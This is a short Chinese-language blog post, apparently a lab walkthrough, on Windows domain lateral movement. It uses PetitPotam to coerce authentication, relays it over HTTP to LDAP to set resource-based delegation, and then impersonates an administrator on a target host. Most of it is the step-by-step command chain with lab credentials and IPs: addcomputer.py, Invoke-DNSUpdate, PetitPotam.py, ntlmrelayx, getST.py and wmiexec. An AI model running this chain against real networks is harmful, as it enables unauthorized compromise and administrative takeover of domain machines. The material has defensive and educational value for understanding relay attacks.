PetitPotam配合资源委派的横向技巧

PetitPotam配合基于资源委派的横向技巧

原理:使用PetitPotam将目标主机的身份认证中继到dc的ldap服务配置资源委派,然后使用资源委派获取目标主机权限。

当微软修复CVE-2019-1040的时候,顺便修了smb中继到ldap。

但是我们还能通过http中继到ldap,但前提条件是目标打开Webclient服务,server默认不安装,win7,win10默认安装但是需要手动打开服务。

avatar

条件:

  • 域账户一个
  • 目标主机需要打开Webclient服务

细节:

  • http中继到ldap
  • http中继需要使用可信域名,域内dns即为可信域名

start

假设已经有了一个域普通用户账户,目标win7,开启webclient服务

1.用已知域普通用户,添加机器用户rbcd

1
addcomputer.py sec.local/nortest:p@ssw0rd -method SAMR -computer-name rbcd -computer-pass Password123 -dc-host Ads.sec.local -dc-ip 192.168.60.128 -debug

2.用已知域普通用户,添加DNS解析

1
2
3
Invoke-DNSUpdate -DNSName ubuntu -DNSData 192.168.60.130

这里是因为没找到远程添加dns的工具,直接上域机器加了DNS记录。

avatar

3.使用PetitPotam中继http请求

1
2
3
python3 PetitPotam.py -d sec.local -u nortest -p p@ssw0rd ubuntu@80/ubuntu.sec.local 192.168.60.133

sudo ntlmrelayx.py -t ldap://192.168.60.128 --delegate-access --escalate-user rbcd$ --no-dump -smb2support

avatar

4.使用资源委派拿目标主机的票据

1
getST.py sec.local/rbcd$:Password123 -dc-ip 192.168.60.128 -spn cifs/WIN7.sec.local -impersonate administrator

avatar

5.导入票据并使用wmiexec执行命令,获取权限

1
2
3
export KRB5CCNAME=administrator.ccache

wmiexec.py -dc-ip 192.168.60.128 -k -no-pass WIN7.sec.local whoami

avatar

[^本来以为是域内非server机器乱杀,结果有前提条件,略显鸡肋。]: